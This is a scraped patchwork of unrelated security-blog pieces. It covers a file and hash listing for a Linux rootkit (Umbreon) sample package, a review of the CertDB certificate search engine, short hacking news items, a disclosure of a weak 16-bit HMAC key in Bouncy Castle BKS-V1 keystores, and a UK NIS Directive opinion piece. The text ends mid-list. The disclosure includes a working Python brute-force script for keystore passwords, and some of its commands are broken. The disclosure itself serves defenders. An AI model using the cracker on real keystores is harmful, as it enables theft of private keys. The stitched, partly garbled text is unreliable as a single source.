Research: Trend Micro

There are two packages:
one is the full package 'found in the wild', and the other is a set of files matching the hashes from the Trend Micro article (all but one file are already in the full package)


Download (email me if you need the password)

File information

Part one (full package)

# | File Name | MD5 Hash | File Size (on Disk) | Duplicate?
1 | .umbreon-ascii | 0B880E0F447CD5B6A8D295EFE40AFA37 | 6085 bytes (5.94 KiB) |
2 | autoroot | 1C5FAEEC3D8C50FAC589CD0ADD0765C7 | 281 bytes |
3 | CHANGELOG | A1502129706BA19667F128B44D19DC3C | 11 bytes |
4 | cli.sh | C846143BDA087783B3DC6C244C2707DC | 5682 bytes (5.55 KiB) |
5 | hideports | D41D8CD98F00B204E9800998ECF8427E | 0 bytes | Yes, of file promptlog
6 | install.sh | 9DE30162E7A8F0279E19C2C30280FFF8 | 5634 bytes (5.5 KiB) |
7 | Makefile | 0F5B1E70ADC867DD3A22CA62644007E5 | 797 bytes |
8 | portchecker | 006D162A0D0AA294C85214963A3D3145 | 113 bytes |
9 | promptlog | D41D8CD98F00B204E9800998ECF8427E | 0 bytes |
10 | readlink.c | 42FC7D7E2F9147AB3C18B0C4316AD3D8 | 1357 bytes (1.33 KiB) |
11 | ReadMe.txt | B7172B364BF5FB8B5C30FF528F6C5125 | 2244 bytes (2.19 KiB) |
12 | setup | 694FFF4D2623CA7BB8270F5124493F37 | 332 bytes |
13 | spytty.sh | 0AB776FA8A0FBED2EF26C9933C32E97C | 1011 bytes | Yes, of file
14 | umbreon.c | 91706EF9717176DBB59A0F77FE95241C | 1007 bytes |
15 | access.c | 7C0A86A27B322E63C3C29121788998B8 | 713 bytes |
16 | audit.c | A2B2812C80C93C9375BFB0D7BFCEFD5B | 1434 bytes (1.4 KiB) |
17 | chown.c | FF9B679C7AB3F57CFBBB852A13A350B2 | 2870 bytes (2.8 KiB) |
18 | config.h | 980DEE60956A916AFC9D2997043D4887 | 967 bytes |
19 | config.h.dist | 980DEE60956A916AFC9D2997043D4887 | 967 bytes | Yes, of file config.h
20 | dirs.c | 46B20CC7DA2BDB9ECE65E36A4F987ABC | 3639 bytes (3.55 KiB) |
21 | dlsym.c | 796DA079CC7E4BD7F6293136604DC07B | 4088 bytes (3.99 KiB) |
22 | exec.c | 1935ED453FB83A0A538224AFAAC71B21 | 4033 bytes (3.94 KiB) |
23 | getpath.h | 588603EF387EB617668B00EAFDAEA393 | 183 bytes |
24 | getprocname.h | F5781A9E267ED849FD4D2F5F3DFB8077 | 805 bytes |
25 | includes.h | F4797AE4B2D5B3B252E0456020F58E59 | 629 bytes |
26 | kill.c | C4BD132FC2FFBC84EA5103ABE6DC023D | 555 bytes |
27 | links.c | 898D73E1AC14DE657316F084AADA58A0 | 2274 bytes (2.22 KiB) |
28 | local-door.c | 76FC3E9E2758BAF48E1E9B442DB98BF8 | 501 bytes |
29 | lpcap.h | EA6822B23FE02041BE506ED1A182E5CB | 1690 bytes (1.65 KiB) |
30 | maps.c | 9BCD90BEA8D9F9F6270CF2017F9974E2 | 1100 bytes (1.07 KiB) |
31 | misc.h | 1F9FCC5D84633931CDD77B32DB1D50D0 | 2728 bytes (2.66 KiB) |
32 | netstat.c | 00CF3F7E7EA92E7A954282021DD72DC4 | 1113 bytes (1.09 KiB) |
33 | open.c | F7EE88A523AD2477FF8EC17C9DCD7C02 | 8594 bytes (8.39 KiB) |
34 | pam.c | 7A947FDC0264947B2D293E1F4D69684A | 2010 bytes (1.96 KiB) |
35 | pam_private.h | 2C60F925842CEB42FFD639E7C763C7B0 | 12480 bytes (12.19 KiB) |
36 | pam_vprompt.c | 017FB0F736A0BC65431A25E1A9D393FE | 3826 bytes (3.74 KiB) |
37 | passwd.c | A0D183BBE86D05E3782B5B24E2C96413 | 2364 bytes (2.31 KiB) |
38 | pcap.c | FF911CA192B111BD0D9368AFACA03C46 | 1295 bytes (1.26 KiB) |
39 | procstat.c | 7B14E97649CD767C256D4CD6E4F8D452 | 398 bytes |
40 | procstatus.c | 72ED74C03F4FAB0C1B801687BE200F06 | 3303 bytes (3.23 KiB) |
41 | readwrite.c | C068ED372DEAF8E87D0133EAC0A274A8 | 2710 bytes (2.65 KiB) |
42 | rename.c | C36BE9C01FEADE2EF4D5EA03BD2B3C05 | 535 bytes |
43 | setgid.c | 5C023259F2C244193BDA394E2C0B8313 | 667 bytes |
44 | sha256.h | 003D805D919B4EC621B800C6C239BAE0 | 545 bytes |
45 | socket.c | 348AEF06AFA259BFC4E943715DB5A00B | 579 bytes |
46 | stat.c | E510EE1F78BD349E02F47A7EB001B0E3 | 7627 bytes (7.45 KiB) |
47 | syslog.c | 7CD3273E09A6C08451DD598A0F18B570 | 1497 bytes (1.46 KiB) |
48 | umbreon.h | F76CAC6D564DEACFC6319FA167375BA5 | 4316 bytes (4.21 KiB) |
49 | unhide-funcs.c | 1A9F62B04319DA84EF71A1B091434C64 | 4729 bytes (4.62 KiB) |
50 | cryptpass.py | 2EA92D6EC59D85474ED7A91C8518E7EC | 192 bytes |
51 | environment.sh | 70F467FE218E128258D7356B7CE328F1 | 1086 bytes (1.06 KiB) |
52 | espeon-connect.sh | A574C885C450FCA048E79AD6937FED2E | 247 bytes |
53 | espeon-shell | 9EEF7E7E3C1BEE2F8591A088244BE0CB | 2167 bytes (2.12 KiB) |
54 | espeon.c | 499FF5CF81C2624B0C3B0B7E9C6D980D | 14899 bytes (14.55 KiB) |
55 | listen.sh | 69DA525AEA227BE9E4B8D59ACFF4D717 | 209 bytes |
56 | spytty.sh | 0AB776FA8A0FBED2EF26C9933C32E97C | 1011 bytes |
57 | ssh-hidden.sh | AE54F343FE974302F0D31776B72D0987 | 127 bytes |
58 | unfuck.c | 457B6E90C7FA42A7C46D464FBF1D68E2 | 384 bytes |
59 | unhide-self.py | B982597CEB7274617F286CA80864F499 | 986 bytes |
60 | listen.sh | F5BD197F34E3D0BD8EA28B182CCE7270 | 233 bytes |

Part two (those listed in the Trend Micro article)

# | File Name (SHA256) | MD5 Hash | File Size (on Disk)
1 | 015a84eb1d18beb310e7aeeceab8b84776078935c45924b3a10aa884a93e28ac | A47E38464754289C0F4A55ED7BB55648 | 9375 bytes (9.16 KiB)
2 | 0751cf716ea9bc18e78eb2a82cc9ea0cac73d70a7a74c91740c95312c8a9d53a | F9BA2429EAE5471ACDE820102C5B8159 | 7512 bytes (7.34 KiB)
3 | 0a4d5ffb1407d409a55f1aed5c5286d4f31fe17bc99eabff64aa1498c5482a5f | 0AB776FA8A0FBED2EF26C9933C32E97C | 1011 bytes
4 | 0ce8c09bb6ce433fb8b388c369d7491953cf9bb5426a7bee752150118616d8ff | B982597CEB7274617F286CA80864F499 | 986 bytes
5 | 122417853c1eb1868e429cacc499ef75cfc018b87da87b1f61bff53e9b8e8670 | 9EEF7E7E3C1BEE2F8591A088244BE0CB | 2167 bytes (2.12 KiB)
6 | 409c90ecd56e9abcb9f290063ec7783ecbe125c321af3f8ba5dcbde6e15ac64a | B4746BB5E697F23A5842ABCAED36C914 | 6149 bytes (6 KiB)
7 | 4fc4b5dab105e03f03ba3ec301bab9e2d37f17a431dee7f2e5a8dfadcca4c234 | D0D97899131C29B3EC9AE89A6D49A23E | 65160 bytes (63.63 KiB)
8 | 8752d16e32a611763eee97da6528734751153ac1699c4693c84b6e9e4fb08784 | E7E82D29DFB1FC484ED277C702187818 | 55564 bytes (54.26 KiB)
9 | 991179b6ba7d4aeabdf463118e4a2984276401368f4ab842ad8a5b8b73088522 | 2B1863ACDC0068ED5D50590CF792DF05 | 7664 bytes (7.48 KiB)
10 | a378b85f8f41de164832d27ebf7006370c1fb8eda23bb09a3586ed29b5dbdddf | A977F68C59040E40A822C384D1CEDEB6 | 176 bytes
11 | aa24deb830a2b1aa694e580c5efb24f979d6c5d861b56354a6acb1ad0cf9809b | DF320ED7EE6CCF9F979AEFE451877FFC | 26 bytes
12 | acfb014304b6f2cff00c668a9a2a3a9cbb6f24db6d074a8914dd69b43afa4525 | 84D552B5D22E40BDA23E6587B1BC532D | 6852 bytes (6.69 KiB)
13 | c80d19f6f3372f4cc6e75ae1af54e8727b54b51aaf2794fedd3a1aa463140480 | 087DD79515D37F7ADA78FF5793A42B7B | 11184 bytes (10.92 KiB)
14 | e9bce46584acbf59a779d1565687964991d7033d63c06bddabcfc4375c5f1853 | BBEB18C0C3E038747C78FCAB3E0444E3 | 71940 bytes (70.25 KiB)

Is your VPN secure? How to check for leaks

A trustworthy virtual private network (VPN) is a good way to keep your internet usage secure and private whether at home or on public Wi-Fi. But just how private is your activity over a VPN? In other words, how do you know if the VPN is doing its job or if you’re unwittingly leaking information to prying eyes?

To find out, you first need to know what your computer looks like to the internet without a VPN running. Start by searching for “what is my IP” on Google. At the top of the search results, Google will report back your current public Internet Protocol (IP) address. That’s a good place to start, but there is more to your internet connection and its potential for leaks.


CertDB is a free SSL certificate search engine and analysis platform


How many times have you stumbled on an SSL certificate where the only things you cared about were the Common Name (CN), the DNS names, and the issue and expiry dates? Did you know an SSL certificate can say a great deal about you or your firm? Certificates tell stories and reveal motives; you can gather good intelligence from them: which companies are hosting new domains and sub-domains, whether they just revoked their last certificate, or why some firm switched its vendors or CAs. We have all read that SSL certificates are strong in principle but weak in their issuance process, i.e. the chain of trust relying on the Certificate Authorities (business firms, in effect), but few of us have played with them at scale. There are search engines available, but none as comprehensive, fast, and free as CertDB.

There have been quite a few attacks and hacks where Certificate Authorities were targeted[1] by hacking groups[2] or even involved[3] directly. Even though the broad initiatives by browsers and firms to regularly monitor SSL certificates[4], improve browser behaviour for awareness[5], and revoke bad certificates have been highly appreciated, pentesters often don't find much during a comprehensive assessment. Recently there has been an uproar over the business interests of CAs in the issuance process, so much so that some are being tagged as bad and untrusted CAs[6] for not doing their job well. Companies are moving aggressively to HTTPS, especially with the recent introduction of LetsEncrypt wildcard certificates. But we haven't seen all this information brought together on a common platform to analyse certificates, assess a firm's digital SSL footprint, and gather valuable intelligence.

This is where CertDB steps in: a great project maintained by smart people and FREE forever[7] for the public. I spent the last few weeks using their services and platform, and my short verdict is: it is great! It does have some quirks, but it is highly recommended!

CertDB and certificate transparency (CT) search engines serve different objectives. A CT-based engine gets its data from the CT logging system, where "legit" CAs submit certs in "real time"; CertDB is based on scanning the IPv4 space and domains and "finding & analyzing" certificates, good or bad.

CertDB can also find self-signed certificates, which CT logs cannot. Hence, CertDB can give a realistic view of HTTPS (which IP is using what certs, self-signed, invalid CA, etc.), while CT logs show the "good", law-abiding view, so to speak.

What is CertDB?

CertDB is an Internet search engine for SSL certificates. In simple terms, it parses each certificate and makes its fields indexable so the user can execute search queries. It indexes the following common fields:

Field        Details
Subject      Country, State, Category, Serial Number, Locality, Organization, Common Name
Issuer       Country, State, Locality, Organization, Common Name
Others       Public Key, IP address related to the domain, validity dates
Fingerprint  SHA1, SHA256 and MD5
Extensions   Usage, Subject Key ID, Authority Key ID, ALT Names, Certificate Policies

Once these fields are extracted, you can query them and build intelligence around the results. Every field is available through a logical query language, and fields can be combined into complex queries. CertDB also makes the raw certificate, the public key and a JSON-formatted version of the certificate information available for download. Recently the team integrated Alexa rankings with domains and IP addresses, and all of this information is filtered into browsable lists: top domains, top organizations, top countries, top issuers and so on.

One exciting list is "expiring certificates", which shows domains and organizations whose certificates are about to expire. This kind of information can be very convenient when auditing or assessing a firm's digital footprint.

Real-time updates

While the documentation says CertDB continuously scans every reachable web server on the Internet, my lab tests were not conclusive. I have asked the team to clarify and shall publish the response as part of the interview once I have a confirmed reply. Still, it is appreciable that once their scanner detects a certificate, the information is available for the public to analyse in near real time.

Use Cases

All of the information extracted from the digital certificates can be filtered via the GUI or the API. The GUI is open to all and supports these queries through the search box, but to use the API you have to register an account.

Once you register, an API key is allotted to you, good for 1,000 queries a day with a maximum of 1,000 results per query.

Field           Value
Method          GET, POST
api_key         <get your key post registration>
q               any query (just like in the search interface)
response_type   0 — JSON list of dictionaries with found certificates and all details
                1 — JSON list of found certificates in base64
                2 — JSON list of distinct organizations from found certificates
                3 — JSON list of distinct domains from found certificates

It takes 30 seconds to register and receive the API key. Here are a few example queries:

  1. Certificates issued by "Godaddy" to an "Italian region" domain/company.
    issuer:"" country:"Italy"
  2. Certificates issued to a subnet or IP range (example: the Amazon global IP range[8]).
    cidr:"" (to list the comma-separated results one per line and keep only the first ten, pipe the output through: tr ',' '\n' | head -10)
  3. Certificates expiring in the next ten days.
    expiring:"10 days"
  4. Certificates expiring in the next seven days for the Netflix organization.
    expiring:"7 days" organization:"Netflix"
  5. New certificates in the last five days for Safeway Insurance Company (via the API).
    new:"5 days" organization:"Safeway Insurance Company"
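The parameters described above can be combined into a small helper script. Here is a hedged sketch in Python; note that the endpoint URL is a placeholder assumption (the real one is in the CertDB documentation), and the response layout follows the response_type table above:

```python
from urllib.parse import urlencode

API_URL = "https://certdb.com/api/"  # hypothetical endpoint; check the CertDB docs

def build_query(api_key, q, response_type=0):
    # response_type follows the table above: 0 = full certificate details,
    # 1 = base64 certificates, 2 = distinct organizations, 3 = distinct domains.
    params = {"api_key": api_key, "q": q, "response_type": response_type}
    return API_URL + "?" + urlencode(params)

url = build_query("YOUR_KEY", 'expiring:"7 days" organization:"Netflix"', 3)
print(url)
# Fetch the URL with urllib.request.urlopen() and parse the JSON body with
# json.loads(); prefer sending the same parameters in a POST body instead,
# since a key in a GET URL can be cached along the way (see the issues below).
```

This is a sketch under the stated assumptions, not a definitive client.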

There can be many such cases where you would like to know which certificates were issued to a firm in the past, or whether the firm recently acquired a new domain or sub-domain for a new line of business. If I were doing an assessment, I could think of the following interesting cases:

  1. Dork all the subdomains, then start negating in a loop based on the first result: -www, then -www -test, and so on. Or use a threat-intel tool to gather the sub-domains and validate that they all have SSL certificates. Check manually, and report any domains that are not on HTTPS (refer: Google will be hard on you if you are not on HTTPS!).
  2. If you are technically assessing a company, check its domain names and organization: q="organization:"Example Inc."". You may be surprised to find that firms are sometimes unaware of domains registered in their name, or of certificates issued to them but not renewed on time.


While the service is great, there are a few issues as well, which the team is working on:

  1. The errors are not customized. If an API query is wrong, it dumps a lot of debug data, which should be removed.
  2. The API key cannot be re-generated or revoked. You may have to contact CertDB support to revoke it.
  3. The API Key can be used in a GET request. It is not recommended as it can be cached at many hops (example: proxy)
  4. The documentation is not comprehensive; more detailed information is needed for the API calls.
  5. The site doesn't provide any example of API interaction. In my opinion, CertDB should publish a page with a few examples in Python, curl, Ruby, Perl and other common languages, including JSON parsing of the results.


I have been using this service for a few weeks now, and my frank opinion is that it has great potential and use. I am using it while assessing AWS instances and Fortune 500 firms, and I have found expiring certificates for clients and informed them in due course. I highly recommend that you have a look and register an account. You can also set up a cron job to check the dates and digital SSL footprint of an organization.

Next Steps: I shall soon be publishing an interview with their team asking for more details on the roadmap, competition, and improvements.

Cover Image Credit: Photo by Rubén Bagüés

  1. Comodo CA attack by Iranian hackers ↩︎

  2. Dutch DigiNotar attack by Iranian hackers ↩︎

  3. CEO Emails Private Keys ↩︎

  4. Certificate Transparency is important ↩︎

  5. A secure web by Google ↩︎

  6. Distrust of the Symantec PKI: Immediate action needed by site operators ↩︎

  7. In an exclusive interview with Cyber Sins, CERTDB confirms this "project" will always be free to use. ↩︎

  8. Amazon IP Range: ↩︎

Three Hacking Groups You Definitely Need to Know About

Hacker groups began to flourish in the early 1980s with the emergence of computers. Hackers are like predators that can access your private data at any time by exploiting the vulnerabilities of your computer. They usually cover their tracks by leaving false clues or by leaving no evidence at all. In the light of…

The post Three Hacking Groups You Definitely Need to Know About appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Why the Cyber Criminals at Synack need $25 Million to Track Down Main Safety Faults

The enormous number of hacks in 2014 has propelled information security to the front of the news and into the minds of many companies. Cyber attacks on big enterprises like Target, Sony, and Home Depot recently led President Obama to call for a partnership between the private and public sectors in order to share information…


Want to have a VPN Server on Your Computer (Windows) Without setting up Any Software?

Windows has a built-in ability to work as a VPN server, even though this option is hidden. It works on both Windows 7 and Windows 8. To enable it, the server makes use of the Point-to-Point Tunneling Protocol (PPTP). This can be useful for connecting to your home network on…


The US health insurance company Premera Blue Cross was cyber attacked and 11 million records were accessed

Premera Blue Cross, a United States-based health insurance corporation, has confirmed that its systems were breached when cyber criminals hacked the company and made their way into 11 million of its customers' records. It is the second cyber attack in a row…


Analysts caution that airplane communications systems are susceptible to cyber attacks

Commercial and even military planes have an Achilles heel that could leave them susceptible to cyber criminals on the ground, who specialists say could possibly seize cockpits and create disorder in the skies. At present, radical groups are thought to lack the sophistication to bring down a plane remotely, but it…


Researcher makes $225,000, legally, by cyber attacking browsers

A single security researcher made $225,000 this week, all by legal means, by hacking browsers. For the past two days, security researchers have descended on Vancouver for a Google-sponsored competition called Pwn2Own…


Vanished in 60 seconds! – Chinese hackers shut down Adobe Flash, Internet Explorer

Members of two Chinese hacking teams have taken the top prizes at a major yearly hacking competition held in Vancouver, Canada. Competitors at Pwn2Own, which began in 2007, succeeded in breaking the security of widely used software including Adobe Flash, Mozilla's Firefox browser, Adobe PDF Reader and Microsoft's freshly discontinued Internet…


Microsoft Remote Desktop Connection Manager

Imagine having access to and control of your computer from any place in the world via your iPhone. That would be really futuristic, no? Actually, it is not, because there are applications available that let you tap into your computer from your mobile. These remote control applications do more than simply allow you…


Anonymous wants to further its engagement in the exploration of space – ‘Unite as Species’

The hacktivist group Anonymous, more often than not associated with cyber campaigns against fraudulent government administrations and terrorist organizations, has now set its sights on space. The group posted a video on its main YouTube channel on the 18th of March, calling on everyone through…


The Curious Case of the Bouncy Castle BKS Passwords

While investigating BKS files, the path I went down led me to an interesting discovery: BKS-V1 files will accept any number of passwords to reveal information about potentially sensitive contents!

In preparation for my BSidesSF talk, I've been looking at a lot of key files. One file type that caught my interest is the Bouncy Castle BKS (version 1) file format. Like password-protected PKCS12 and JKS keystore files, BKS keystore files protect their contents from those who do not know the password. That is, a BKS file may contain only public information, such as a certificate. Or it may contain one or more private keys. But you won't know until after you use the password to unlock it.

Update March 21, 2018:
We have updated this blog post based on feedback from Thomas Pornin, and confirmation from the Bouncy Castle author. Like JKS files, BKS files do not protect the metadata of their contents by default. The keystore-level password and associated key are only used for integrity checking. By default, private keys are encrypted with the same password as the keystore. These private keys are not affected by the keystore-level weakness outlined in this blog post. That is, even if an unexpected password is accepted by a keystore itself, that same password will not be accepted to decrypt the private key contained within a keystore. Original wording in this blog post that is now understood to be inaccurate has been marked in strikeout notation for transparency.

Cracking BKS Files

As I investigated the first BKS file in my list, I quickly ~~realized~~ assumed that I could not determine what it contained unless I had the password. Naively searching the web for things like "bks cracker" and stopping there, I concluded that I'd need to roll my own BKS brute-force cracker.

Update March 21, 2018:
Tools used to inspect BKS files will refuse to list the contents of the keystore if a valid password is not provided. However, this is not because the metadata of the keystore contents is protected. Because that metadata is not encrypted, it can be viewed without needing a valid password.

Using the pyjks library, I wrote a trivial script:

#!/usr/bin/env python3

import sys
import jks

def trypw(bksfile, pw):
    try:
        keystore = jks.bks.BksKeyStore.load(bksfile, pw)
        if keystore:
            print('Password for %s found: "%s"' % (bksfile, pw))
    except jks.util.KeystoreSignatureException:
        pass  # integrity check failed: wrong password
    except UnicodeDecodeError:
        pass  # candidate password could not be decoded

with open(sys.argv[1]) as h:
    pwlist = h.readlines()

for pw in pwlist:
    trypw(sys.argv[2], pw.rstrip())

Let's try this on the test BKS file that I have:

$ python strings.txt test.bks
Password for test.bks found: "Redefinir senha"

Cool. "Redefinir senha" seems like an unexpected password to me, but it's not terrible in strength. It has 15 characters, and uses mixed-case and a non-alphanumeric character (a space). Depending on the password-cracking technique used, it could hold up pretty well to bruteforce attacks.

The above proof-of-concept script is quite slow, since it will serially attempt passwords, one at a time. Taking advantage of multi-core systems in Python isn't as easy as it should be, due to the Python GIL. As a simple test, I tried using the ProcessPoolExecutor to see if I could increase my password-attempt throughput. ProcessPoolExecutor side-steps the GIL by spreading the work across multiple Python processes. Each Python process has its own GIL, but because multiple Python processes are being used, this approach should help better utilize my multiprocessor system.
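The pattern looks something like the sketch below. To keep it self-contained, a cheap SHA-1 comparison stands in for the real keystore check (an actual cracker would call jks.bks.BksKeyStore.load as in the script above; the stand-in is purely an assumption for illustration):

```python
from concurrent.futures import ProcessPoolExecutor
import hashlib

# Stand-in for the real keystore check; a genuine cracker would call
# jks.bks.BksKeyStore.load(bksfile, pw) here instead.
TARGET = hashlib.sha1(b"Redefinir senha").hexdigest()

def trypw(pw):
    # Return the password if it "unlocks" the simulated keystore, else None.
    if hashlib.sha1(pw.encode()).hexdigest() == TARGET:
        return pw
    return None

def crack(pwlist):
    # Each worker process carries its own GIL, so CPU-bound password attempts
    # genuinely run in parallel across cores.
    with ProcessPoolExecutor() as pool:
        for result in pool.map(trypw, pwlist):
            if result is not None:
                # Without explicit cancellation, already-submitted attempts
                # keep running after a hit, which matters below.
                return result
    return None

if __name__ == "__main__":
    print(crack(["hunter2", "Redefinir senha", ""]))
```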

Let's try this version of the brute-force cracking tool:

$ python strings.txt test.bks
Password for test.bks found: "Redefinir senha"
Password for test.bks found: "Activity started without extras"
Password for test.bks found: ""

Wait, what is going on here? How can a single BKS file accept multiple passwords? As it turns out, there are two things going on:

First, when I optimized my BKS bruteforce script with the use of ProcessPoolExecutor, I didn't factor in how the script would behave when it is distributed across multiple processes. In the single-threaded instance above, the script exits as soon as it finds the password. However, when it's distributed across multiple processes using ProcessPoolExecutor, things are different. I didn't have any code to explicitly terminate the parent Python process or any of the forked Python processes. The impact of this is that my multi-process BKS cracking script will continue to make attempts after it finds the password.

The other thing that is happening is related to the BKS file format, which I discuss below.

Hashes and Collisions

When a resource is password-protected with a single password, it is extremely unlikely that another password can also be used to unlock it. Consider the simple case where a collision-resistant hash function is used to verify the password: is a given password's hash unique?

Applying a cryptographic hash function to an example password results in the following hashes:
MD5 (128-bit): 18fcfa801383d10dd0a1fea051674469
SHA-1 (160-bit): c9e2ef80e5f2afb8aef0d058182cc7f59e93e025
SHA-256 (256-bit): 08a6c455079687616e997c7bfd626ae754ba1a71b229db1b3a515cfa45e9d4ea
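You can reproduce this kind of comparison yourself (with a made-up password, since the input behind the digests above is not shown):

```python
import hashlib

pw = b"example-password"  # hypothetical; not the password behind the digests above

for name in ("md5", "sha1", "sha256"):
    digest = hashlib.new(name, pw).hexdigest()
    # Each hex character encodes 4 bits, so len(digest) * 4 is the digest size.
    print(name, len(digest) * 4, digest)
```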

The MD5 hash algorithm, which has a digest size of 128 bits, was shown in 1996 to be unsafe if a collision-resistant hash is required. By 2005, researchers produced a pair of PostScript documents and a pair of X.509 certificates where each pair shared the same MD5 hash. While it takes a bit of CPU processing power to find such collisions, it's feasible to do so with modern computing hardware.

The SHA-1 hash algorithm, which has a digest size of 160 bits, is more resistant to collisions than MD5. However, by February 2017, the first known SHA-1 collision was produced. This attack required "the equivalent processing power as 6,500 years of single-CPU computations and 110 years of single-GPU computations."

The SHA-256 hash algorithm, which has a digest size of 256 bits, is even more resistant to collisions than SHA-1. To date, no collisions have been found using the SHA-256 hashing algorithm.

BKS-V1 Files and Accidental Collisions

My naive BKS bruteforcing script produced three different passwords for the same BKS file. Let's look at the code for handling BKS files in pyjks:

hmac_fn = hashlib.sha1
hmac_digest_size = hmac_fn().digest_size
hmac_key_size = hmac_digest_size*8 if version != 1 else hmac_digest_size
hmac_key = rfc7292.derive_key(hmac_fn, rfc7292.PURPOSE_MAC_MATERIAL, store_password, salt, iteration_count, hmac_key_size//8)

Here we can see that the HMAC function is SHA-1, which isn't bad. However, it turns out that it's the HMAC key (and its size) that is important, since that's what determines whether the correct password has been provided to unlock the BKS keystore file. If the file is a BKS version 1 file, the hmac_key_size value will be the same as hmac_digest_size.

In the case of hashlib.sha1, the digest_size is 20 bytes (160 bits). Where it gets interesting is the derivation of hmac_key: its size is hmac_key_size//8 (integer division, dropping any remainder). In this case that's 20//8, which is 2 bytes (16 bits). Why is there integer division by 8 at all? It's not clear, but perhaps the developer confused where bits and where bytes are used in the code.
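The arithmetic is easy to check:

```python
import hashlib

digest_size = hashlib.sha1().digest_size   # 20 bytes, i.e. 160 bits
hmac_key_size = digest_size                # BKS-V1: bytes where bits were expected
key_bytes = hmac_key_size // 8             # 20 // 8 == 2 bytes (16 bits)
print(key_bytes)                           # → 2

# The non-V1 path multiplies by 8 first, so the division is harmless there:
print((digest_size * 8) // 8)              # → 20 bytes (160 bits)
```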

Let's add a debugging print() statement to the key-derivation code of pyjks and test our three different passwords against the same BKS keystore:

$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', 'Redefinir senha')"
hmac_key: c019
$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', 'Activity started without extras')"
hmac_key: c019
$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', '')"
hmac_key: c019

Here we can see that the hmac_key value is c019 (hex) with each of the three different passwords that are provided. In each of the three cases, the BKS-V1 keystore is decrypted, despite the likelihood that not one of the three accepted passwords was the one chosen by the software developer.

Why was I accidentally able to find BKS-V1 password collisions thanks to my shoddy Python programming skills? Because the maximum entropy you get from any BKS-V1 password is only 16 bits, which is nowhere near enough to represent a password. When it comes to password strength, entropy is a useful measure. Against pure brute force, each case-sensitive Latin alphabet character adds about 5.7 bits of entropy, so a randomly chosen three-character, case-sensitive Latin alphabet password has about 17.1 bits of entropy, which already exceeds what 16 bits can represent. In other words, while a developer can choose a reasonably strong password to protect the ~~contents~~ integrity of a BKS-V1 file, the file format itself only supports complexity equivalent to just less than what a randomly selected, case-sensitive three-letter password provides.
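The arithmetic behind that comparison is quick to verify:

```python
import math

bits_per_char = math.log2(52)          # case-sensitive Latin alphabet: ~5.7 bits
print(round(3 * bits_per_char, 1))     # → 17.1 bits for three random characters
print(2 ** 16)                         # → 65536 distinct 16-bit HMAC keys
```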

Cracking BKS-V1 Files

What amount of integrity protection does a 16-bit hmac_key provide? Virtually none. 16 bits can represent only 65,536 different values, which means that regardless of the password complexity the developer has chosen, a brute-force password cracker needs to try at most 65,536 times. A high-end GPU these days can crunch through over 10 billion SHA-1 operations per second.

As it turns out, John the Ripper does have BKS file support, despite what my earlier web searches turned up. While there is currently no GPU support for cracking BKS files, a CPU is plenty fast: my limited testing has shown that any BKS-V1 file can be cracked in about 10 seconds or less using just a single CPU core on a modern system.

Conclusion and Recommendations

Without a doubt, BKS-V1 keystore files are insecure due to the insufficient HMAC key size. Although BKS files support password protection to protect their ~~contents~~ integrity, the protection supplied by version 1 of the file format is nearly zero. For these reasons, here are recommendations for developers who use Bouncy Castle:

  • Be sure to use Bouncy Castle version 1.47 or newer. This version, introduced on March 30, 2012, increases the default MAC key size of a BKS keystore from 2 bytes to 20 bytes.

    This information has been in the release notes for Bouncy Castle for about six years, but it may have been overlooked because no CVE identifier was assigned to this weakness. Approximately 84% of the BKS files seen in Android applications are using the vulnerable version 1. We assigned CVE-2018-5382 to this issue to help ensure that it gets the attention it deserves.
  • On modern Bouncy Castle versions, do not use the "BKS-V1" format, which was added for legacy compatibility with Bouncy Castle version 1.46 and earlier.
  • If you rely on the password protection provided by BKS-V1 to protect private key material, these private keys should be considered compromised. Such keys should be regenerated and stored in a keystore that provides adequate protection against brute-force attacks, along with a sufficiently long and complex password. For BKS files that contain only public information, such as certificates, the weak password protection provided by version 1 of the format is not important.

For more details, please see CERT Vulnerability Note VU#306792.

The NIS Directive – just how tough is it really?

Over the last few months, UK media outlets have been filled with reports about the series of tough new measures being introduced on 9th May to protect our national critical infrastructure against cyber threats. In January, the government confirmed that UK critical infrastructure organisations may soon be liable for fines of up to £17m if they fail to implement robust cyber security measures, under its plans to implement the EU’s Network and Information Systems (NIS) Directive. But despite the tough talk, are the current proposals as rigorous as they sound?

In January, the government published its plans to implement the NIS Directive into UK law, following a public consultation. But despite the punitive penalty system, the response avoided making any hard recommendations, instead adopting a high-level "appropriate and proportionate technical and organisational measures" regulatory approach that defers responsibility to the National Cyber Security Centre (NCSC) and the Competent Authorities. Looking at the NCSC guidance, the measures it outlines are heavily weighted toward reactive attack reporting rather than advising organisations on how to better shore up their perimeter with proactive defences. As an example, within the guidance organisations are asked to define their own risk profile, and then prove their resilience against that profile: the equivalent of being graded on a test you wrote yourself.

In this light, it’s unclear how the opportunity to set out a framework of minimum standards for CNI can be effectively achieved with the NIS Regulations. If the intended outcome is genuinely tied to resilience against cyber-attacks, then these essential services should be required to remain available during all but the most extreme cyber-attacks. The outcome described in the guidance points to merely the proper disclosure of failed protection and the swift recovery from that failure. My concern remains that implementation of the NIS Directive will be viewed as a mere “tick box” exercise which requires the bare minimum to be done, rather than allowing the UK to set world-leading standards in this area.

As a UK citizen, I fear that our government is failing to deliver on the promises outlined in its Digital Strategy, which pledged to make the UK “the safest place in the world to live and work online.” This is all deeply concerning, especially given that Ciaran Martin, the head of the NCSC, warned in January that it was a matter of “when, not if” the UK faces a major cyber-attack that might cripple infrastructure such as energy supplies or the financial services sector. Across all parts of critical national infrastructure, we are seeing a greater number of sophisticated and damaging cyber threats which are often believed to be the work of foreign governments seeking to cause political upheaval. Last year’s DDoS attacks against the transport network in Sweden caused train delays and disrupted travel services, while the WannaCry ransomware attacks last May demonstrated the capacity for cyber-attacks to impact people’s access to essential services. Only this month, we have seen a surge in record-breaking DDoS attacks that exploit the Memcached vulnerability.

As the draft NIS Regulations become UK law, we have a golden opportunity to improve the UK’s cyber security posture. Let’s hope we can still seize this moment and build an eco-system that genuinely protects our critical infrastructure against today’s cyber-attacks.

These Best Practices Will Stop 90% Of The Cyber Threat

The leadership of our consultancy Crucial Point have been working to enhance the security posture and mitigate cyber risks for over a decade, successfully operating across multiple sectors of the economy to help leaders thwart dynamic adversaries. In doing so we have found most businesses can take steps to raise defenses before calling in the experts.

The nine steps below, taken from the Crucial Point Best Cybersecurity Practices page, can help kickstart the defense of any firm.

These steps are:

